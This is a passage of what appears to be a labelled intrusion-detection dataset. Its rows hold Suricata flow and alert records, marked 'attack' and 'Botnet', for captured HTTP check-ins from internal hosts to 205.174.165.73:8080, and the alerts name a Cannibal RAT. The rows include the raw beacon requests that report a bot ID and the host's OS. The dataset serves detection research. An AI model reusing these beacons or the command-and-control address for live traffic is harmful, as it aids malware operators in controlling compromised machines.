'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoIPBAAIAGnDbAqAoJza6lSQkyH5DwEwJB89oCX1ARAQBf2QAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,242,319
192.168.10.15-52230-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4326459, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:18:48
68,929
Friday
[{'timestamp': '2017-07-07T13:18:48.077730+0000', 'flow_id': 874251501970864, 'pcap_cnt': 4326459, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52230, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:18:48.009648+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobiJAAIAGTv7AqAoPza6lScwGH5CJehchtR1erFARAQDRJwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:18:48.077730+0000', 'flow_id': 874251501970864, 'pcap_cnt': 4326459, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52230, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:18:48.009648+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobiJAAIAGTv7AqAoPza6lScwGH5CJehchtR1erFARAQDRJwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,242,735
192.168.10.15-52231-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4329596, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:19:12
67,362
Friday
[{'timestamp': '2017-07-07T13:19:12.342455+0000', 'flow_id': 1459591121483166, 'pcap_cnt': 4329596, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52231, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:19:12.275870+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobidAAIAGTvnAqAoPza6lScwHH5BMnYT9LtWP71ARAQD1LAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:19:12.342455+0000', 'flow_id': 1459591121483166, 'pcap_cnt': 4329596, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52231, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:19:12.275870+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobidAAIAGTvnAqAoPza6lScwHH5BMnYT9LtWP71ARAQD1LAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,242,825
192.168.10.9-2363-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4341075, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:19:56
74,758
Friday
[{'timestamp': '2017-07-07T13:19:56.592383+0000', 'flow_id': 1548587141753160, 'pcap_cnt': 4341075, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2363, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:19:56.518472+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoIjhAAIAGmu7AqAoJza6lSQk7H5BXVZ4YxFA+NVARAQBQawAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:19:56.592383+0000', 'flow_id': 1548587141753160, 'pcap_cnt': 4341075, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2363, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:19:56.518472+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoIjhAAIAGmu7AqAoJza6lSQk7H5BXVZ4YxFA+NVARAQBQawAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
308
attack
1,243,209
192.168.10.15-52232-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4344288, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:20:28
77,565
Friday
[{'timestamp': '2017-07-07T13:20:28.150155+0000', 'flow_id': 1190386871311983, 'pcap_cnt': 4344288, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52232, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:20:28.073327+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobixAAIAGTvTAqAoPza6lScwIH5BlTLvrF7aNu1ARAQC+4QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:20:28.150155+0000', 'flow_id': 1190386871311983, 'pcap_cnt': 4344288, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52232, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:20:28.073327+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobixAAIAGTvTAqAoPza6lScwIH5BlTLvrF7aNu1ARAQC+4QAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,243,345
192.168.10.15-52233-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4348411, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:20:52
63,539
Friday
[{'timestamp': '2017-07-07T13:20:52.401478+0000', 'flow_id': 1571075594136353, 'pcap_cnt': 4348411, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52233, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:20:52.338721+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobjFAAIAGTu/AqAoPza6lScwJH5DPnSVRRGDyjlARAQBZrAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:20:52.401478+0000', 'flow_id': 1571075594136353, 'pcap_cnt': 4348411, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52233, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:20:52.338721+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobjFAAIAGTu/AqAoPza6lScwJH5DPnSVRRGDyjlARAQBZrAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
308
attack
1,243,612
192.168.10.9-2401-205.174.165.73-8080-6
['flow', 'http']
